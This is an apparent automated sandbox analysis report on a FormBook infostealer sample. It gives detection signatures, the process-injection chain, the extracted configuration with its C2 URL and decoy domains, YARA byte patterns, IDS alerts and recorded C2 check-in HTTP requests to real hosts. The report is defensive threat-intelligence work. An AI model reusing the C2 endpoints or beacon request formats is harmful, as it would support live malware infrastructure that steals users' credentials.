Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report LWlcpDjYIQ.exe

Overview

General Information

Sample Name:LWlcpDjYIQ.exe
Analysis ID:383953
MD5:91523f8d438585534d9466432cc4665d
SHA1:e34b69f0ded056eca7dd43b8f5be2edf7198c211
SHA256:b5e3426a888ddb5751f9802093f1bd10ec696b2994bee03b99b7ba2b4f21a57d
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • LWlcpDjYIQ.exe (PID: 5524 cmdline: 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' MD5: 91523F8D438585534D9466432CC4665D)
    • LWlcpDjYIQ.exe (PID: 3664 cmdline: 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' MD5: 91523F8D438585534D9466432CC4665D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5796 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 6136 cmdline: /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.simplyhealrhcareplans.com/sqra/"], "decoy": ["edwardjonescredticard.com", "muzhskoy-eskort.site", "home-sou.com", "entohops.com", "orchidandiris.com", "kellnetworks.com", "shopthen2.site", "jimmysga.com", "carobbella.com", "fenuadiscovery.com", "huongdandidong.com", "greenesgoodies.com", "socialunified.com", "azure-vs-google.cloud", "bardototonho.com", "anadelalastra.art", "godseyepiece.com", "18082020.com", "3559044.com", "hvacservicecoldwater.com", "inlandempiresublease.com", "cenconsulting.com", "clavunica.com", "zx765.com", "ndrossignol.com", "lumpkinforless.com", "merrypopinnannies.com", "herbalbooze.com", "opusleaf.com", "karizcustomizeme.com", "miss-windy.com", "esl-materials.com", "flcpyl.com", "metort.com", "ggapp.run", "josiahtreatenglishportfolio.com", "charmdalat.com", "kaashir.com", "magenx2.info", "mysfmp.com", "dailyhyundaihanoi.net", "camperlifeclub.com", "familymedicalurgentcare.com", "unityprawn.com", "crosswhiteconsulting.com", "luxel01.com", "runwithbe.com", "marfrigs.com", "lewishackney.com", "legalhelp.black", "thedorkweb.com", "carritogastronomico.com", "sniffai.com", "myboardinghome.com", "szameitat.net", "wegawk.com", "ecomcourse.online", "heritagelcc.com", "launchtutor.com", "bricksli.com", "911salesrescue.com", "shangbinjieneng.com", "seymor-law.com", "decoviewer.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.LWlcpDjYIQ.exe.1eb20000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.LWlcpDjYIQ.exe.1eb20000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.LWlcpDjYIQ.exe.1eb20000.5.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        2.2.LWlcpDjYIQ.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.LWlcpDjYIQ.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.lewishackney.com/sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJVAvira URL Cloud: Label: malware
          Source: http://www.ecomcourse.online/sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJVAvira URL Cloud: Label: malware
          Source: http://www.muzhskoy-eskort.site/sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJVAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.simplyhealrhcareplans.com/sqra/"], "decoy": ["edwardjonescredticard.com", "muzhskoy-eskort.site", "home-sou.com", "entohops.com", "orchidandiris.com", "kellnetworks.com", "shopthen2.site", "jimmysga.com", "carobbella.com", "fenuadiscovery.com", "huongdandidong.com", "greenesgoodies.com", "socialunified.com", "azure-vs-google.cloud", "bardototonho.com", "anadelalastra.art", "godseyepiece.com", "18082020.com", "3559044.com", "hvacservicecoldwater.com", "inlandempiresublease.com", "cenconsulting.com", "clavunica.com", "zx765.com", "ndrossignol.com", "lumpkinforless.com", "merrypopinnannies.com", "herbalbooze.com", "opusleaf.com", "karizcustomizeme.com", "miss-windy.com", "esl-materials.com", "flcpyl.com", "metort.com", "ggapp.run", "josiahtreatenglishportfolio.com", "charmdalat.com", "kaashir.com", "magenx2.info", "mysfmp.com", "dailyhyundaihanoi.net", "camperlifeclub.com", "familymedicalurgentcare.com", "unityprawn.com", "crosswhiteconsulting.com", "luxel01.com", "runwithbe.com", "marfrigs.com", "lewishackney.com", "legalhelp.black", "thedorkweb.com", "carritogastronomico.com", "sniffai.com", "myboardinghome.com", "szameitat.net", "wegawk.com", "ecomcourse.online", "heritagelcc.com", "launchtutor.com", "bricksli.com", "911salesrescue.com", "shangbinjieneng.com", "seymor-law.com", "decoviewer.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dllReversingLabs: Detection: 24%
          Multi AV Scanner detection for submitted fileShow sources
          Source: LWlcpDjYIQ.exeReversingLabs: Detection: 65%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.256436700.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.215824395.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: 7.2.cmstp.exe.45c708.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.cmstp.exe.4b87960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: LWlcpDjYIQ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: LWlcpDjYIQ.exe, 00000000.00000003.210847086.000000001ECE0000.00000004.00000001.sdmp, LWlcpDjYIQ.exe, 00000002.00000002.256684216.0000000000B1F000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: LWlcpDjYIQ.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_0040531D
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405CB0
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 4x nop then pop esi2_2_0041581E
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 4x nop then pop edi2_2_004162A4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi7_2_028562A4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop esi7_2_0285581E

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49722 -> 118.27.122.19:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49722 -> 118.27.122.19:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49722 -> 118.27.122.19:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 108.186.210.142:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 108.186.210.142:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49731 -> 108.186.210.142:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 5.101.152.161:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 5.101.152.161:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 5.101.152.161:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 208.91.197.27:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 208.91.197.27:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 208.91.197.27:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.simplyhealrhcareplans.com/sqra/
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1Host: www.karizcustomizeme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.luxel01.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy HTTP/1.1Host: www.orchidandiris.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.anadelalastra.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.ecomcourse.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi HTTP/1.1Host: www.huongdandidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.muzhskoy-eskort.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK HTTP/1.1Host: www.simplyhealrhcareplans.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob HTTP/1.1Host: www.socialunified.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.lewishackney.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 HTTP/1.1Host: www.shopthen2.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1Host: www.karizcustomizeme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: C:\Windows\explorer.exeCode function: 5_2_06416302 getaddrinfo,setsockopt,recv,5_2_06416302
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1Host: www.karizcustomizeme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.luxel01.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy HTTP/1.1Host: www.orchidandiris.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.anadelalastra.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.ecomcourse.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi HTTP/1.1Host: www.huongdandidong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.muzhskoy-eskort.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK HTTP/1.1Host: www.simplyhealrhcareplans.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob HTTP/1.1Host: www.socialunified.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV HTTP/1.1Host: www.lewishackney.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 HTTP/1.1Host: www.shopthen2.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1Host: www.karizcustomizeme.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.karizcustomizeme.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.13.4Date: Thu, 08 Apr 2021 11:02:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 285Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 72 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 6f 70 74 68 65 6e 32 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqra/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.shopthen2.site Port 80</address></body></html>
          Source: explorer.exe, 00000005.00000000.240958021.000000000F709000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
